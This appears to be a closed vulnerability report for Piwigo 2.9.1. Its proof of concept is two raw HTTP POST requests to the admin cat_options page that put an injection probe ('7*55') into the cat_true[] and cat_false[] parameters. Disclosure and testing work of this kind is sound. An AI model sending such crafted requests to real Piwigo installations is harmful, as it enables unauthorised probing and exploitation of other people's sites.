Closed
Description
Proof-of-Concent
version:2.9.1
section status
POST /piwigo/admin.php?page=cat_options§ion=status HTTP/1.1
Host: www.test.com
Content-Length: 34
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.test.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.test.com/piwigo/admin.php?page=cat_options§ion=status
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: pwg_id=4elnfc2n8r49dpl10dna2t3080
Connection: close
cat_false%5B%5D=755&trueify=%C2%AB
section commnets
POST /piwigo/admin.php?page=cat_options§ion=comments HTTP/1.1
Host: www.test.com
Content-Length: 33
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.test.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.test.com/piwigo/admin.php?page=cat_options§ion=comments
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: pwg_id=4elnfc2n8r49dpl10dna2t3080
Connection: close
cat_true%5B%5D=7*55&falsify=%C2%BB


